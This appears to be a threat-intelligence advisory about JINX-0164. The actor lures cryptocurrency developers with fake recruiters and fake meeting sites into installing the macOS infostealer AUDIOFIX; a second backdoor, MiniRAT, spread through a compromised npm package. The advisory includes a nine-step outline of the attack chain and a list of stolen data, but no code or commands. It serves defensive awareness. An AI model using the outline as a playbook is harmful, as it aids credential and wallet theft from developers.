JINX-0164 Targets Cryptocurrency Firms with Fake Recruiter Lures and macOS Malware

Severity
Medium

Detail

Cybersecurity researchers have uncovered a financially motivated threat actor known as JINX-0164 targeting cryptocurrency companies and software developers using recruiter-themed social engineering attacks and custom macOS malware. The campaign primarily focuses on stealing cryptocurrency assets, compromising developer environments, and infiltrating CI/CD infrastructure.

The attackers impersonate recruiters using realistic LinkedIn profiles and approach victims with fake job opportunities or interview invitations. Victims are then directed to malicious teleconference websites designed to imitate legitimate meeting platforms. During the fake meeting setup, users are instructed to download a supposed software fix or audio driver update, which actually installs malware on their macOS devices.

The malware deployed in these attacks is a Python-based infostealer and remote access trojan called AUDIOFIX. The payload is downloaded through a bash script hosted on attacker-controlled domains disguised as Apple driver repositories. The malware supports both Intel and Apple Silicon systems and disguises itself as legitimate macOS system processes such as “coreaudiod” to avoid detection. Once installed, AUDIOFIX steals extensive sensitive information from infected systems, including:

• Browser credentials
• Password manager data
• iCloud Keychain files
• SSH keys
• Local administrator credentials
• Cryptocurrency wallet information
• Browser extension data
• Active Discord, Slack, and Telegram sessions
• Shell histories and configuration files

The malware also enables remote command execution, file manipulation, payload downloads, reconnaissance activities, and data exfiltration. Researchers observed the attackers moving laterally from compromised developer laptops into internal development environments and CI/CD systems, where they attempted to modify source code and compromise additional systems.

Another malware component linked to the campaign is MiniRAT, a Go-based backdoor previously distributed through a compromised npm package named “@velora-dex/sdk,” a legitimate decentralized finance (DeFi) toolkit. The malicious version downloaded shell scripts that deployed MiniRAT on macOS systems, enabling attackers to upload files, execute commands, and retrieve additional payloads.

Researchers noted similarities between JINX-0164 and North Korean cryptocurrency-focused threat groups due to the use of recruiter lures, fake domains, VPN services, and developer targeting. However, no direct infrastructure overlap with known North Korean groups has been confirmed.

How?

1. Attackers create fake recruiter profiles on LinkedIn and contact developers or employees working in cryptocurrency organizations.
2. Victims are invited to join a virtual interview or meeting hosted on a fake teleconference website.
3. During the session setup, users are prompted to download a fake software fix or audio driver update.
4. A malicious bash script downloads the AUDIOFIX malware payload from attacker-controlled infrastructure.
5. The malware installs itself as a disguised macOS process and establishes persistence using launchctl.
6. AUDIOFIX steals credentials, wallet information, SSH keys, browser data, messaging sessions, and sensitive development files.
7. Attackers use the stolen access to move laterally into development infrastructure and CI/CD systems.
8. In some cases, malicious code is inserted into software packages or repositories to facilitate supply chain compromise and additional infections.
9. MiniRAT and other payloads may be deployed to maintain persistent remote access and expand compromise within the victim environment.

Conclusion

The JINX-0164 campaign demonstrates how threat actors are increasingly combining advanced social engineering with tailored malware to target cryptocurrency organizations and developers. By abusing trusted recruitment workflows and disguising malware as legitimate system updates, the attackers successfully compromise macOS systems and gain access to sensitive development infrastructure.

The campaign also highlights the growing risk of software supply chain attacks within the cryptocurrency ecosystem, where compromising a single developer or package can potentially impact many downstream users. Organizations should strengthen identity verification processes for recruitment interactions, monitor CI/CD environments closely, enforce strict access controls, and educate employees about social engineering techniques targeting developers and cryptocurrency platforms.

Source

https://thehackernews.com/2026/05/jinx-0164-targets-cryptocurrency-firms.html